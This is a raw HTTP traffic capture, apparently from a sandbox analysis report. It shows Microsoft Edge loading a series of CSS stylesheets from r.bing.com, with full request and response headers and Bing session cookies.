Akamai-GRN: 0.a4777b5c.1728144349.f099aed
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/f7F7gkCBmf3fpEpT07FtU78rkg4.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/f7F7gkCBmf3fpEpT07FtU78rkg4.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Last-Modified: Sat, 02 Apr 2022 02:30:09 GMT
ETag: 0x8DA1450B551B21C
Content-Length: 141
Content-Type: text/css; charset=utf-8
Content-Encoding: br
Content-MD5: EAR/p1M0HKbJY1291VA1pw==
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 738be66f-101e-0099-7291-b77b11000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=403983
Expires: Thu, 10 Oct 2024 08:18:52 GMT
Date: Sat, 05 Oct 2024 16:05:49 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144349.f0a1fc4
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/qknPGyrUUs04dCZE8vL9P-T_IMs.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/qknPGyrUUs04dCZE8vL9P-T_IMs.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 112
Content-Type: text/css
Content-Encoding: br
Content-MD5: ZSZUxDRcxsUVOkwtoCoKWA==
Last-Modified: Tue, 24 Sep 2024 07:02:58 GMT
ETag: 0x8DCDC66EC25EE85
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 62cebf65-d01e-005c-2c30-161b69000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=315159
Expires: Wed, 09 Oct 2024 07:38:29 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f0a2111
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rb/3U/cc,nc/ZOYbVXpq18yLnUtuc0-dHAFFlHs.css?bu=AowDrQM&or=w

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rb/3U/cc,nc/ZOYbVXpq18yLnUtuc0-dHAFFlHs.css?bu=AowDrQM&or=w HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 334
Content-Type: text/css; charset=utf-8
Server: Kestrel
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
Content-Encoding: br
Last-Modified: Thu, 16 Dec 2010 20:34:09 GMT
X-EventID: 66e4a71099184fd79863e5b29e1391dc
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
X-AS-InstrumentationOptions: AppServerLoggingMaster=1
X-AS-MACHINENAME: DUBEEAP0000E040
X-AS-SuppressSetCookie: 1
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
Cache-Control: public, max-age=113579
Expires: Sun, 06 Oct 2024 23:38:49 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f0a22a9
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/zh5yhbkbJVkzFqNrcigech9CW1Y.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/zh5yhbkbJVkzFqNrcigech9CW1Y.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 39
Content-Type: text/css
Content-Encoding: br
Content-MD5: b4OWVwR8+xEsCRiKFGSGCg==
Last-Modified: Tue, 24 Sep 2024 07:16:51 GMT
ETag: 0x8DCDC68DC6D229D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d546f8da-a01e-0017-79e8-142af3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=174220
Expires: Mon, 07 Oct 2024 16:29:08 GMT
Date: Sat, 05 Oct 2024 16:05:28 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144328.f0972bc
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/6vW-cIY2Dxj_U1X3fdBnNVLFgF8.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/6vW-cIY2Dxj_U1X3fdBnNVLFgF8.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 1273
Content-Type: text/css
Content-Encoding: br
Content-MD5: nL46pcr+xJOe1GQ8ZSrC9A==
Last-Modified: Tue, 24 Sep 2024 05:50:54 GMT
ETag: 0x8DCDC5CDACF93C9
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 10c81bb5-e01e-0039-4cd1-15aa34000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=274535
Expires: Tue, 08 Oct 2024 20:21:04 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f0972cf
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/kOm4AqlRH_KYkP_B2D5VD-3ub90.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/kOm4AqlRH_KYkP_B2D5VD-3ub90.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 135
Content-Type: text/css; charset=utf-8
Content-Encoding: br
Content-MD5: mpX4caCJEiLBUDS1cFK42Q==
Last-Modified: Tue, 28 Nov 2023 21:38:37 GMT
ETag: 0x8DBF05A61B4432F
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: dbc609a8-e01e-00b2-40b6-10fbdd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Akamai-GRN: 0.76c61cb8.1727433855.f63d9f4
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Cache-Control: public, no-transform, max-age=94086
Expires: Sun, 06 Oct 2024 18:13:35 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f0973d6
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/iex9xOQQZy9eCAA55osfedgdfHY.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/iex9xOQQZy9eCAA55osfedgdfHY.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 77
Content-Type: text/css
Content-Encoding: br
Content-MD5: ZjeMbtroVEFDSsesgTeJcQ==
Last-Modified: Tue, 24 Sep 2024 06:50:43 GMT
ETag: 0x8DCDC6535DE7062
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d2f9b7d0-a01e-0058-15c9-14eeeb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=160862
Expires: Mon, 07 Oct 2024 12:46:31 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f0974d8
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/VktYCgYmJQhASKykbCzusQ8Uqo8.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/VktYCgYmJQhASKykbCzusQ8Uqo8.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 637
Content-Type: text/css; charset=utf-8
Content-Encoding: br
Content-MD5: QDWztluiNa6htDWoN3w2OQ==
